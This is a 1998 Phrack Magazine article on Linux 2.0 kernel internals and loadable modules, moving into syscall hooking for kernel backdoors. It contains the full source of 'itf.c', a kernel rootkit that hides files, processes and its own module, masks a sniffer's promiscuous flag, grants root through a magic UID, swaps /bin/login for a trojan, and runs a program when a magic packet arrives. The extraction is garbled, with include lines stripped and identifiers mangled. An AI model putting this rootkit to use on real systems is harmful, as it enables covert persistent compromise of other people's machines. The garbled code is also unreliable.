
---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 18 of 20

-------------------------[ Weakening the Linux Kernel

--------[ plaguez dube0866@eurobretagne.fr

----[ Preamble

The following applies to the Linux x86 2.0.x kernel series. It may also be accurate for previous releases, but has not been tested. 2.1.x kernels introduced a bunch of changes, most notably in the memory management routines, and are not discussed here.

Thanks to Halflife and Solar Designer for lots of neat ideas. Brought to you by plaguez and WSD.

----[ User space vs. Kernel space

Linux supports a number of architectures, however most of the code and discussion in this article refers to the i386 version only.

Memory is divided into two parts: kernel space and user space. Kernel space is defined in the GDT and mapped into each process's address space. User space is defined in the LDT and is local to each process. A given program can't write to kernel memory, even though it is mapped, because the program does not run in the same ring.

Normally you cannot access user memory from the kernel either. However, this is really easy to overcome. When we execute a system call, one of the first things the kernel does is set up ds and es so that memory references point to the kernel data segment. It then sets up fs so that it points to the user data segment. If we want to use kernel memory in a system call, all we should have to do is push fs, then set it to ds. Of course, I have not actually tested this, so take it with a pound or two of salt :).

Here are a few of the useful functions to use in kernel mode for transferring data bytes to or from user memory:

include

get_user(ptr) Gets the given byte, word, or long from user memory. This is a macro, and it relies on the type of the argument to determine the number of bytes to transfer. You then have to use typecasts wisely.

put_user(x, ptr) This is the counterpart of get_user(), but instead of reading, it writes the value x to user memory at ptr. The size of the transfer is again taken from the type of ptr.

memcpy_fromfs(void *to, const void *from, unsigned long n) Copies n bytes from *from in user memory to *to in kernel memory.

memcpy_tofs(void *to, const void *from, unsigned long n) Copies n bytes from *from in kernel memory to *to in user memory.

----[ System calls

Most libc function calls rely on underlying system calls, which are the simplest kernel functions a user program can call. These system calls are implemented in the kernel itself or in loadable kernel modules, which are little chunks of dynamically linkable kernel code.

Like MS-DOS and many others, Linux system calls are implemented through a multiplexor invoked with a given software interrupt. In Linux, this interrupt is int 0x80. When the 'int 0x80' instruction is executed, control is given to the kernel (or, more accurately, to the function _system_call()), and the actual demultiplexing process occurs.

The _system_call() function works as follows:

First, all registers are saved and the content of the %eax register is checked against the global system call table, which lists all system calls and their addresses. This table can be accessed through the extern void *sys_call_table[] variable. Each system call corresponds to a number and a memory address in this table. System call numbers can be found in /usr/include/sys/syscall.h. They are of the form SYS_systemcallname. If the system call is not implemented, the corresponding cell in sys_call_table is 0, and an error is returned. Otherwise, the system call exists and the corresponding entry in the table is the memory address of the system call code.

Here is an example of an invalid system call:

[root@plaguez kernel]# cat no1.c

include

include

include

extern void *sys_call_table[];

int sc(void)
{
    int res;

    /* system call number 165 doesn't exist at this time. */
    __asm__ volatile ("movl $165,%%eax\n\tint $0x80" : "=a" (res));
    return res;
}

int main(void)
{
    errno = -sc();
    perror("test of invalid syscall");
    return 0;
}
[root@plaguez kernel]# gcc no1.c
[root@plaguez kernel]# ./a.out
test of invalid syscall: Function not implemented
[root@plaguez kernel]# exit

Normally, control is then transferred to the actual system call, which performs whatever you requested and returns. _system_call() then calls _ret_from_sys_call() to take care of housekeeping such as pending signals and rescheduling, and ultimately returns to user mode.

----[ libc wrappers

Programs rarely issue int $0x80 directly; rather, they call libc functions, which are often plain wrappers around interrupt 0x80.

libc is actually the user space interface to kernel functions.

libc generally implements the system calls using the _syscallX() macros, where X is the number of parameters for the system call.

For example, the libc entry for write(2) would be implemented with a _syscall3 macro, since the actual write(2) prototype requires 3 parameters. Before calling interrupt 0x80, the _syscallX macros are supposed to set up the stack frame and the argument list required for the system call. Finally, when _system_call() (which is triggered with int $0x80) returns, the _syscallX() macro will check for a negative return value (in %eax) and will set errno accordingly.

Let's check another example with write(2) and see how it gets preprocessed.

[root@plaguez kernel]# cat no2.c

include

include

include

include

include

include

include

include

include

_syscall3(ssize_t,write,int,fd,const void *,buf,size_t,count);

main()
{
    char *t = "this is a test.\n";
    write(0, t, strlen(t));
}
[root@plaguez kernel]# gcc -E no2.c > no2.C
[root@plaguez kernel]# indent no2.C -kr
indent:no2.C:3304: Warning: old style assignment ambiguity in "=-".  Assuming "= -"

[root@plaguez kernel]# tail -n 50 no2.C

# 9 "no2.c" 2

ssize_t write(int fd, const void *buf, size_t count)
{
    long __res;
    __asm__ __volatile__("int $0x80":"=a"(__res):"0"(4), "b"((long) (fd)), "c"((long) (buf)), "d"((long) (count)));
    if (__res >= 0)
        return (ssize_t) __res;
    errno = -__res;
    return -1;
};

main()
{
    char *t = "this is a test.\n";
    write(0, t, strlen(t));
}
[root@plaguez kernel]# exit

Note that the '4' in the write() function above matches the SYS_write definition in /usr/include/sys/syscall.h.

----[ Writing your own system calls.

There are a few ways to create your own system calls. For example, you could modify the kernel sources and append your own code. A far easier way, however, would be to write a loadable kernel module.

A loadable kernel module is nothing more than an object file containing code that will be dynamically linked into the kernel when it is needed.

The main purposes of this feature are to have a small kernel, and to load a given driver when it is needed with the insmod(1) command. It's also easier to write a lkm than to write code in the kernel source tree.

With lkm, adding or modifying system calls is just a matter of modifying the sys_call_table array, as we'll see in the example below.

----[ Writing a lkm

A lkm is easily written in C. It contains a chunk of #defines, the body of the code, an initialization function called init_module(), and an unload function called cleanup_module(). The init_module() and cleanup_module() functions are called when the module is loaded and when it is removed. Also, don't forget that modules are kernel code, and though they are easy to write, any programming mistake can have quite serious results.

Here is a typical lkm source structure:

#define MODULE

#define __KERNEL__

include

#ifdef MODULE

include

include

#else

#define MOD_INC_USE_COUNT

#define MOD_DEC_USE_COUNT

#endif

include

include

include

include

include

include

include

include

include

include

include

include

include

int errno;

char tmp[64];

/* for example, we may need to use ioctl */
_syscall3(int, ioctl, int, d, int, request, unsigned long, arg);

int myfunction(int parm1,char *parm2)
{
    int i,j,k;
    /* ... */
}

int init_module(void)
{
    /* ... */
    printk("\nModule loaded.\n");
    return 0;
}

void cleanup_module(void)
{
    /* ... */
    printk("\nModule unloaded.\n");
}

Note the mandatory #defines (#define MODULE, #define __KERNEL__) and #includes (#include ...).

Also note that as our lkm will be running in kernel mode, we can't use libc functions, but we can use system calls with the previously discussed _syscallX() macros or call them directly using the pointers to functions located in the sys_call_table array.

You would compile this module with 'gcc -c -O3 module.c' and insert it into the kernel with 'insmod module.o' (optimization must be turned on).

As the title suggests, lkm can also be used to modify kernel code without having to rebuild it entirely. For example, you could patch the write(2) system call to hide portions of a given file. Seems like a good place for backdoors, also: what would you do if you couldn't trust your own kernel?

----[ Kernel and system calls backdoors

The main idea behind this is pretty simple. We'll redirect those damn system calls to our own system calls in a lkm, which will enable us to force the kernel to react as we want it to. For example, we could hide a sniffer by patching the IOCTL system call and masking the PROMISC bit. Lame but efficient.

To modify a given system call, just add the declaration extern void *sys_call_table[] to your lkm, and have the init_module() function modify the corresponding entry in sys_call_table to point to your own code. The modified call can then do whatever you wish it to, meaning that, as all user programs rely on those kernel calls, you'll have entire control of the system.

This makes it clear how difficult it can become to get intruders out of a system once they have broken into it. Prevention is still the best route to security, and hardening the Linux kernel is needed on sensitive boxes.

----[ A few programming tricks

#define MODULE

#define __KERNEL__

include

#ifdef MODULE

include

include

#else

#define MOD_INC_USE_COUNT

#define MOD_DEC_USE_COUNT

#endif

include

include

include

include

include

include

include

include

int errno;

/* pointer to the old setreuid system call */
int (*o_setreuid) (uid_t, uid_t);
/* the system calls vectors table */
extern void *sys_call_table[];

int n_setreuid(uid_t ruid, uid_t euid)
{
    printk("uid %i trying to seteuid to euid=%i", current->uid, euid);
    return (*o_setreuid) (ruid, euid);
}

int init_module(void)
{
    o_setreuid = sys_call_table[SYS_setreuid];
    sys_call_table[SYS_setreuid] = (void *) n_setreuid;
    printk("swatch loaded.\n");
    return 0;
}

void cleanup_module(void)
{
    sys_call_table[SYS_setreuid] = o_setreuid;
    printk("swatch unloaded.\n");
}

int init_module() { register struct module mp asm("%ebx"); // or whatever register it is in *(char)mp->name=0; mp->size=0; mp->ref=0; ... }

Since the kernel does not show modules with no name and no references (=kernel modules), ours won't be shown in /proc/modules.

----[ A practical example

Here is itf.c. The goal of this program is to demonstrate kernel backdooring techniques using system call redirection. Once installed, it is very hard to spot.

Its features include:

<++> lkm_trojan.c /* * itf.c v0.8 * Linux Integrated Trojan Facility * (c) plaguez 1997 -- dube0866@eurobretagne.fr * This is mostly not fully tested code. Use at your own risks. * * * compile with: * gcc -c -O3 -fomit-frame-pointer itf.c * Then: * insmod itf * * * Thanks to Halflife and Solar Designer for their help/ideas. * * Greets to: w00w00, GRP, #phrack, #innuendo, K2, YmanZ, Zemial. * * */

define MODULE

define KERNEL

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

/* Customization section * - RECVEXEC is the full pathname of the program to be launched when a packet * of size MAGICSIZE and containing the word MAGICNAME is received with recvfrom(). * This program can be a shell script, but must be able to handle null **argv (I'm too lazy * to write more than execve(RECVEXEC,NULL,NULL); :) * - NEWEXEC is the name of the program that is executed instead of OLDEXEC * when an execve() syscall occurs. * - MAGICUID is the numeric uid that will give you root when a call to setuid(MAGICUID) * is made (like Halflife's code) * - files containing MAGICNAME in their full pathname will be invisible to * a getdents() system call. * - processes containing MAGICNAME in their process name will be hidden of the * procfs tree. */

define MAGICNAME "w00w00T$!"

define MAGICUID 31337

define OLDEXEC "/bin/login"

define NEWEXEC "/.w00w00T$!/w00w00T$!login"

define RECVEXEC "/.w00w00T$!/w00w00T$!recv"

define MAGICSIZE sizeof(MAGICNAME)+10

/* old system calls vectors / int (ogetdents) (uint, struct dirent *, uint); ssizet(o_readdir) (int, void *, size_t); int (osetuid) (uidt); int (o_execve) (const char *, const char *[], const char *[]); int (oioctl) (int, int, unsigned long); int (*ogetkernelsyms) (struct kernelsym *); ssizet(o_read) (int, void *, size_t); int (osocketcall) (int, unsigned long *); /* entry points to brk() and fork() syscall. */ static inline _syscall1(int, brk, void *, enddata_segment); static inline _syscall0(int, fork); static inline _syscall1(void, exit, int, status);

extern void *syscalltable[]; extern struct proto tcp_prot; int errno;

char mtroj[] = MAGICNAME; int _NRmyexecve; int promisc;

/* * String-oriented functions * (from user-space to kernel-space or invert) */

char *strncpy_fromfs(char *dest, const char *src, int n) { char *tmp = src; int compt = 0;

do {
dest[compt++] = __get_user(tmp++, 1);
}
while ((dest[compt - 1] != '\0') && (compt != n));

return dest;

}

int myatoi(char *str) { int res = 0; int mul = 1; char *ptr;

for (ptr = str + strlen(str) - 1; ptr >= str; ptr--) {
if (*ptr < '0' || *ptr > '9')
    return (-1);
res += (*ptr - '0') * mul;
mul *= 10;
}
return (res);

}

/* * process hiding functions */ struct taskstruct *gettask(pidt pid) { struct taskstruct *p = current; do { if (p->pid == pid) return p; p = p->next_task; } while (p != current); return NULL;

}

/* the following function comes from fs/proc/array.c */ static inline char *taskname(struct taskstruct *p, char *buf) { int i; char *name;

name = p->comm;
i = sizeof(p->comm);
do {
unsigned char c = *name;
name++;
i--;
*buf = c;
if (!c)
    break;
if (c == '\\') {
    buf[1] = c;
    buf += 2;
    continue;
}
if (c == '\n') {
    buf[0] = '\\';
    buf[1] = 'n';
    buf += 2;
    continue;
}
buf++;
}
while (i);
*buf = '\n';
return buf + 1;

}

int invisible(pidt pid) { struct taskstruct *task = gettask(pid); char *buffer; if (task) { buffer = kmalloc(200, GFPKERNEL); memset(buffer, 0, 200); task_name(task, buffer); if (strstr(buffer, (char *) &mtroj)) { kfree(buffer); return 1; } } return 0; }

/* * New system calls */

/* * hide module symbols */ int ngetkernelsyms(struct kernelsym *table) { struct kernel_sym *tb; int compt, compt2, compt3, i, done;

compt = (*o_get_kernel_syms) (table);
if (table != NULL) {
tb = kmalloc(compt * sizeof(struct kernel_sym), GFP_KERNEL);
if (tb == 0) {
    return compt;
}
compt2 = 0;
done = 0;
i = 0;
memcpy_fromfs((void *) tb, (void *) table, compt * sizeof(struct kernel_sym));
while (!done) {
    if ((tb[compt2].name)[0] == '#')
    i = compt2;
    if (!strcmp(tb[compt2].name, mtroj)) {
    for (compt3 = i + 1; (tb[compt3].name)[0] != '#' && compt3 < compt; compt3++);
    if (compt3 != (compt - 1))
        memmove((void *) &(tb[i]), (void *) &(tb[compt3]), (compt - compt3) * sizeof(struct kernel_sym));
    else
        compt = i;
    done++;
    }
    compt2++;
    if (compt2 == compt)
    done++;

}

memcpy_tofs(table, tb, compt * sizeof(struct kernel_sym));
kfree(tb);
}
return compt;

}

/* * how it works: * I need to allocate user memory. To do that, I'll do exactly as malloc() does * it (changing the break value). */ int myexecve(const char *filename, const char *argv[], const char *envp[]) { long res; _asm volatile ("int $0x80":"=a" (res):"0"(NRmyexecve), "b"((long) (filename)), "c"((long) (argv)), "d"((long) (envp))); return (int) _res; }

int n_execve(const char *filename, const char *argv[], const char *envp[]) { char *test; int ret, tmp; char *truc = OLDEXEC; char *nouveau = NEWEXEC; unsigned long mmm;

test = (char *) kmalloc(strlen(truc) + 2, GFP_KERNEL);
(void) strncpy_fromfs(test, filename, strlen(truc));
test[strlen(truc)] = '\0';
if (!strcmp(test, truc)) {
kfree(test);
mmm = current->mm->brk;
ret = brk((void *) (mmm + 256));
if (ret < 0)
    return ret;
memcpy_tofs((void *) (mmm + 2), nouveau, strlen(nouveau) + 1);
ret = my_execve((char *) (mmm + 2), argv, envp);
tmp = brk((void *) mmm);
} else {
kfree(test);
ret = my_execve(filename, argv, envp);
}
return ret;

}

/* * Trap the ioctl() system call to hide PROMISC flag on ethernet interfaces. * If we reset the PROMISC flag when the trojan is already running, then it * won't hide it anymore (needed otherwise you'd just have to do an * "ifconfig eth0 +promisc" to find the trojan). */ int n_ioctl(int d, int request, unsigned long arg) { int tmp; struct ifreq ifr;

tmp = (*o_ioctl) (d, request, arg);
if (request == SIOCGIFFLAGS && !promisc) {
memcpy_fromfs((struct ifreq *) &ifr, (struct ifreq *) arg, sizeof(struct ifreq));
ifr.ifr_flags = ifr.ifr_flags & (~IFF_PROMISC);
memcpy_tofs((struct ifreq *) arg, (struct ifreq *) &ifr, sizeof(struct ifreq));
} else if (request == SIOCSIFFLAGS) {
memcpy_fromfs((struct ifreq *) &ifr, (struct ifreq *) arg, sizeof(struct ifreq));
if (ifr.ifr_flags & IFF_PROMISC)
    promisc = 1;
else if (!(ifr.ifr_flags & IFF_PROMISC))
    promisc = 0;
}
return tmp;

}

/* * trojan setMAGICUID() system call. */ int nsetuid(uidt uid) { int tmp;

if (uid == MAGICUID) {
current->uid = 0;
current->euid = 0;
current->gid = 0;
current->egid = 0;
return 0;
}
tmp = (*o_setuid) (uid);
return tmp;

}

/* * trojan getdents() system call. */ int n_getdents(unsigned int fd, struct dirent *dirp, unsigned int count) { unsigned int tmp, n; int t, proc = 0; struct inode *dinode; struct dirent *dirp2, *dirp3;

tmp = (*o_getdents) (fd, dirp, count);

ifdef _LINUXDCACHE_H

dinode = current->files->fd[fd]->f_dentry->d_inode;

else

dinode = current->files->fd[fd]->f_inode;

endif

if (dinode->i_ino == PROC_ROOT_INO && !MAJOR(dinode->i_dev) && MINOR(dinode->i_dev) == 1)
proc = 1;
if (tmp > 0) {
dirp2 = (struct dirent *) kmalloc(tmp, GFP_KERNEL);
memcpy_fromfs(dirp2, dirp, tmp);
dirp3 = dirp2;
t = tmp;
while (t > 0) {
    n = dirp3->d_reclen;
    t -= n;
    if ((strstr((char *) &(dirp3->d_name), (char *) &mtroj) != NULL) \
    ||(proc && invisible(myatoi(dirp3->d_name)))) {
    if (t != 0)
        memmove(dirp3, (char *) dirp3 + dirp3->d_reclen, t);
    else
        dirp3->d_off = 1024;
    tmp -= n;
    }
    if (dirp3->d_reclen == 0) {
    /*
     * workaround for some shitty fs drivers that do not properly
     * feature the getdents syscall.
     */
    tmp -= t;
    t = 0;
    }
    if (t != 0)
    dirp3 = (struct dirent *) ((char *) dirp3 + dirp3->d_reclen);


}
memcpy_tofs(dirp, dirp2, tmp);
kfree(dirp2);
}
return tmp;

}

/* * Trojan socketcall system call * executes a given binary when a packet containing the magic word is received. * WARNING: THIS IS REALLY UNTESTED UGLY CODE. MAY CORRUPT YOUR SYSTEM.
*/

int n_socketcall(int call, unsigned long *args) { int ret, ret2, compt; char *t = RECVEXEC; unsigned long *sargs = args; unsigned long a0, a1, mmm; void *buf;

ret = (*o_socketcall) (call, args);
if (ret == MAGICSIZE && call == SYS_RECVFROM) {
a0 = get_user(sargs);
a1 = get_user(sargs + 1);
buf = kmalloc(ret, GFP_KERNEL);
memcpy_fromfs(buf, (void *) a1, ret);
for (compt = 0; compt < ret; compt++)
    if (((char *) (buf))[compt] == 0)
    ((char *) (buf))[compt] = 1;
if (strstr(buf, mtroj)) {
    kfree(buf);
    ret2 = fork();
    if (ret2 == 0) {
    mmm = current->mm->brk;
    ret2 = brk((void *) (mmm + 256));
    memcpy_tofs((void *) mmm + 2, (void *) t, strlen(t) + 1);

/* Hope the execve has been successfull otherwise you'll have 2 copies of the master process in the ps list :] */ ret2 = my_execve((char *) mmm + 2, NULL, NULL); } } } return ret; }

/* * module initialization stuff. / int init_module(void) { / module list cleaning / / would need to make a clean search of the right register * in the function prologue, since gcc may not always put * struct module mp in %ebx * * Try %ebx, %edi, %ebp, well, every register actually :) */ register struct module *mp asm("%ebx"); *(char *) (mp->name) = 0; mp->size = 0; mp->ref = 0; / * Make it unremovable / / MODINCUSECOUNT; */ ogetkernelsyms = syscalltable[SYSgetkernelsyms]; syscalltable[SYSgetkernelsyms] = (void *) ngetkernel_syms;

o_getdents = sys_call_table[SYS_getdents];
sys_call_table[SYS_getdents] = (void *) n_getdents;

o_setuid = sys_call_table[SYS_setuid];
sys_call_table[SYS_setuid] = (void *) n_setuid;

__NR_myexecve = 164;
while (__NR_myexecve != 0 && sys_call_table[__NR_myexecve] != 0)
__NR_myexecve--;
o_execve = sys_call_table[SYS_execve];
if (__NR_myexecve != 0) {
sys_call_table[__NR_myexecve] = o_execve;
sys_call_table[SYS_execve] = (void *) n_execve;
}
promisc = 0;
o_ioctl = sys_call_table[SYS_ioctl];
sys_call_table[SYS_ioctl] = (void *) n_ioctl;

o_socketcall = sys_call_table[SYS_socketcall];
sys_call_table[SYS_socketcall] = (void *) n_socketcall;
return 0;

}

void cleanupmodule(void) { syscalltable[SYSgetkernelsyms] = ogetkernelsyms; syscalltable[SYSgetdents] = ogetdents; syscalltable[SYSsetuid] = osetuid; syscalltable[SYSsocketcall] = o_socketcall;

if (__NR_myexecve != 0)
sys_call_table[__NR_myexecve] = 0;
sys_call_table[SYS_execve] = o_execve;

sys_call_table[SYS_ioctl] = o_ioctl;

} <-->

----[ EOF